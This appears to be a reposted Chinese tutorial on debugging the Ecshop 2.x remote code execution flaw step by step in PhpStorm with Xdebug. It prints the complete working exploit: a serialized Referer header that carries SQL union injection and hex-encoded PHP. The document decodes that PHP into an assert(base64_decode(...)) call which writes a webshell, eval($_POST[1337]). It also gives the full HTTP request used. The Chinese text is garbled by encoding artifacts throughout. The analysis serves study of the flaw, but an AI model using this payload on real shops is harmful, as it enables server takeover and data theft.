如何進(jìn)行Ecshop2.x代碼執(zhí)行漏洞動(dòng)態(tài)調(diào)試分析

如何進(jìn)行Ecshop2.x代碼執(zhí)行漏洞動(dòng)態(tài)調(diào)試分析，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來(lái)學(xué)習(xí)下，希望你能有所收獲。

一、背景介紹

號(hào)稱(chēng)國(guó)內(nèi)最大的開(kāi)源網(wǎng)店系統(tǒng)，可以直接遠(yuǎn)程寫(xiě)入webshell。

本文會(huì)通過(guò)動(dòng)態(tài)分析來(lái)解析漏洞每個(gè)細(xì)節(jié)，關(guān)于漏洞原理可以看漏洞原理，講的很詳細(xì)，本文重點(diǎn)介紹動(dòng)態(tài)分析審計(jì)的技巧和如何調(diào)試漏洞，關(guān)于漏洞本身也是一個(gè)很值得學(xué)習(xí)的漏洞，能構(gòu)造出這個(gè)攻擊鏈?zhǔn)切枰獙?duì)每個(gè)細(xì)節(jié)都有深刻的認(rèn)識(shí)才能實(shí)現(xiàn)的。

二、動(dòng)態(tài)調(diào)試環(huán)境搭建

自行下載安裝phpstudy和phpstorm

首先確定php版本

然后修改配置文件    

修改php.ini中如下

[XDebug]

xdebug.profiler_append = 0xdebug.profiler_enable = 1xdebug.profiler_enable_trigger = 0xdebug.profiler_output_dir ="C:\phpStudy\tmp\xdebug"xdebug.trace_output_dir ="C:\phpStudy\tmp\xdebug"xdebug.profiler_output_name = "cache.out.%t-%s"xdebug.remote_enable = 1xdebug.remote_handler = "dbgp"xdebug.remote_host = "127.0.0.1"zend_extension="C:\phpStudy\php53\ext\xdebug.dll"xdebug.remote_port=9000xdebug.idekey= PHPSTROM

設(shè)置php版本，一定要對(duì)應(yīng)上

下面圖片是默認(rèn)的不用動(dòng)

下面的修改key和端口如下

在這里配置根目錄調(diào)試環(huán)境    

這里就留一個(gè)Chrome瀏覽器

Chrome瀏覽器要安裝插件JetBrains IDE Support 下載安裝好了不用修改配置，這樣就基本可以了。 

三、漏洞動(dòng)態(tài)調(diào)試分析

下面進(jìn)行動(dòng)態(tài)分析，動(dòng)態(tài)分析的好處就是漏洞分析起來(lái)更加清晰。

下斷點(diǎn)這里我們斷到了漏洞起始點(diǎn)方便分析每一個(gè)細(xì)節(jié)，然后點(diǎn)擊debug，

然后瀏覽器會(huì)打開(kāi)

然后點(diǎn)擊登錄，會(huì)觸發(fā)斷點(diǎn)，可以看到停到了斷點(diǎn)處

下面介紹使用的一些快捷鍵：

f7會(huì)跟進(jìn)函數(shù) ，

f8 步出也就是一行一行走，不進(jìn)入函數(shù)，有些循環(huán)或者不想看的函數(shù)直接f8，

進(jìn)入函數(shù)后想跳出去就用shift+f8

Ctrl+art加 點(diǎn)擊想要看的函數(shù)就會(huì)進(jìn)入

Alt +f7 會(huì)搜索誰(shuí)調(diào)用了這個(gè)函數(shù)或者變量

筆者常用的就這些，掌握這些技能后就可以調(diào)試

這里HTTP_REFFER可控到賦值到$back_act

我們先用burp抓包測(cè)試下漏洞 ，先分析下payload

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}

554fcae493e564ee0dc75bdf2ebf94caads 這串可以分解成兩塊，一個(gè)是554fcae493e564ee0dc75bdf2ebf94ca，一個(gè)是ads，ads是控制函數(shù)流程進(jìn)入到insert_ads函數(shù)，554fcae493e564ee0dc75bdf2ebf94ca前面的這個(gè)就是個(gè)hash，后面會(huì)對(duì)它判斷，判斷后會(huì)把它去掉，沒(méi)有它是進(jìn)入不了攻擊鏈的，后面再動(dòng)態(tài)分析過(guò)程會(huì)介紹到。

后面的編碼部分解開(kāi)是這樣

{$asd'];assert(base64_decode('file_put_contents('1.php','<?php eval($_POST[1337]); ?>')'));//}xxx

發(fā)包

GET /upload/user.php?act=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS[visit_times]=1Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10--    -";s:2:"id";s:3:"'/*";}Connection: closeUpgrade-Insecure-Requests: 1

可以看的成功寫(xiě)入webshell

然后我們繼續(xù)調(diào)試，我們先一路f8走到這里，然后再f7進(jìn)入看看

這里的關(guān)鍵點(diǎn)是insert_mod,動(dòng)態(tài)調(diào)用，因?yàn)槲覀儧](méi)辦法抓包發(fā)送payload測(cè)試，所以這里面我們需要自己修改參數(shù)讓流程按照payload攻擊鏈來(lái)執(zhí)行，攻擊鏈中需要執(zhí)行insert_ads,下面的有個(gè)hash判斷

下面的可以看到有這個(gè)hash，所以這里不需要控制，然后繼續(xù)流程

下面圖片中會(huì)把hash去掉然后剩下$k,$k中的1，3,5,7都可以控制，所以這里我們?cè)?修改它的值為我們的payload，右鍵點(diǎn)擊setvalue

把這payload重新復(fù)制，右鍵setValue，這里直接復(fù)制會(huì)報(bào)錯(cuò)，還是一點(diǎn)點(diǎn)修改吧，然后雙引號(hào)要轉(zhuǎn)義

ads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}

繼續(xù)f7進(jìn)入到insert_mod里面，然后發(fā)現(xiàn)，insert_ads函數(shù)已經(jīng)控制了，但是payload被反序列化時(shí)候$para為false，說(shuō)明我們的payload有問(wèn)題，點(diǎn)擊debug重新來(lái)。

換了個(gè)位置修改，在反序列化函數(shù)之前修改，下面圖片可以看到$para有值了，是我們的payload

繼續(xù)走來(lái)到了insert_ads，一路f8，讓我們的payload代入進(jìn)了變量num

最后拼接成了這樣

繼續(xù)往下走，一路f8來(lái)到這里

然后f7進(jìn)入看看，會(huì)把payload代入_eval代碼執(zhí)行函數(shù)，在這里payload還會(huì)被fetch_str處理，f7進(jìn)入看看    

F8來(lái)到這里，在這里之前source都沒(méi)有變化，經(jīng)過(guò)了preg_replace會(huì)處理掉{    

payload變成$asd’;]assertxxx 代入到了select里

這個(gè)select函數(shù)跟入不進(jìn)去，只能靜態(tài)分析下了，可以這樣尋找ctrl+shift+f

在select中進(jìn)入了get_val,substr去掉了$

Payload變成了：asd’;]assertXXX

進(jìn)入到了make_var

最后拼接到了

最終payload變成

$this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//']

最后來(lái)到eval    

這里再走一下就把shell寫(xiě)進(jìn)去了

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注億速云行業(yè)資訊頻道，感謝您對(duì)億速云的支持。